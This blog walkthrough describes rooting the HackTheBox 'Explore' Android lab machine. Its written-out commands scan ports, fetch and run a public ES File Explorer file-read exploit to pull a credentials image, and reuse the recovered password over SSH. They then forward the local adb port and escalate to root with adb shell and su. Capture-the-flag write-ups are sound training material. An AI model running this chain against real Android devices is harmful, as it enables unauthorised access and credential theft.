Explore HackTheBox WalkThrough

Explore HackTheBox Walkthrough

This is Explore HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Explore HackTheBox machine. Before starting let us know something about this box. It is an Android OS box with IP address 10.10.10.247 and difficulty level Easy assigned by its maker.

First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Explore machine by pinging its IP 10.10.10.247. If all goes correct then it is time to start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. I have used nmap for this task and the result is given below: –

Scanning

$ sudo nmap -sT -T4 -sV -p- -oN explore-all-tcp.nmap --min-rate=1000 10.10.10.247
Nmap Scan during Explore HackTheBox Walkthrough

Full TCP port scan revealed 4 ports as open. SSH server on 2222, ES File Explorer on 42135, Bukkit JSONAPI web server on 59777 and an unknown service is running on port 33483. A quick googling on ES File explorer exploit revealed that ES File Explorer on Android is vulnerable to Arbitrary File Read vulnerability. For more info about this vulnerability check this link. You can either use previous link to download exploit code or use this link, all are same. Here is the snippet of the exploit.

ES Explorer exploit Snippet from packetstorm.com
Snip

Using this exploit I could read many files of the Explore machine. When I tried to list all the pics in the android phone, I found a pic named creds.jpg. According to its name it may contains some type of credential. Then I tried to download this pic using the exploit itself but it gave me error You need to provide full path of the file. After trying few more times when I could not able to download it, I tried to access the file using web browser. And the file can be accessed through it. Inside that file [pic] there is a hand written credential present. I followed the given steps to access the file.

Downloading & Executing Exploit

$ wget https://dl.packetstormsecurity.net/2106-exploits/esfileexplorer41974-fileread.txt
$ mv esfileexplorer41974-fileread.txt exploit.py
$ python3 exploit.py listPics 10.10.10.247
$ curl http://10.10.10.247:59777/storage/emulated/0/DCIM/creds.jpg -O
$ firefox creds.jpg
Downloading and executing es explorer exploit during Explore HackTheBox Walkthrough
Creds.jpg file captured during Explore HackTheBox Walkthrough

The extracted credential from the file is kristi : Kr1sT!5h@Rp3xPl0r3!

Getting User Shell

Let us use grabbed credential to login into Kristi’s SSH account.

$ ssh [email protected] -p 2222
~ Kr1sT!5h@Rp3xPl0r3!
$ whoami && id
Getting root shell in Explore HTB walkthrough

We are successfully logged into kristi’s SSH account. Let us capture user flag.

Capture User Flag

$ cat /sdcard/user.txt
Capturing User flag during explore HTB writeup

Privilege Escalation

To escalate the privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation. We can use some post exploitation enumeration script for this task. Check this link if you need more information about a bunch of post exploitation tools.

Finding PrivEsc Vector

$ ss -lnpt

Command revealed that port 5555 is open and listening locally.

Checking all the listening ports in the explore machine

Then I checked which process is running on this port and which user is executing this process. If this will be executed by root or some well-known user then we should definitely have a look on it. Generally, on android port 5555 is used by adb so I checked the running processes and it revealed that adb is being executed by user shell.

$ ps -ef | grep -i adb
Ps command output in explore machine during its walkthrough

A quick googling on adb privilege escalation gave this ppt. According to this ppt we can perform privilege escalation only when we will be logged in as user shell. But currently we are logged in as user u0_a76. We have to anyhow login as user shell to perform privilege escalation. When I logged in as user shell then I could perform privilege escalation very easily. So here our potential PrivEsc vector is Privilege Escalation by exploiting adb [Android Debug Bridge].

Local Port Forwarding

Since adbd service is running locally as user shell we can access this service on our Kali machine by forwarding port 5555 to our Kali machine. Therefore, to access adb I forwarded port 5555 locally to my kali machine through local port forwarding. Now we can see the forwarded port on our Kali machine using $ ss -lnpt command.

$ ssh -L 5555:127.0.0.1:5555 [email protected] -p 2222

Password authentication

Password: Kr1sT!5h@Rp3xPl0r3!
$ ss -lnpt
Local Port forwarding in explore HTB

Getting Root Shell

Once we can access adb service locally then we can easily connect to it and perform privilege escalation. To perform privilege escalation I followed the given steps.

$ adb connect 127.0.0.1
$ adb devices
$ adb shell
$ su
# whoami && id
Getting root shell during Explore HackTheBox Walkthrough

We have successfully got root shell. Let us capture root flag.

Capture Root Flag

# find / -user "root" -type f -name "root.txt" 2>/dev/null
# cat /data/root.txt
Capturing root flag in explore HTB

This was how I rooted Explore HackTheBox machine. Learnt a lot after this challenge, hope you will have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the walkthrough feel free to write us at [email protected].

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/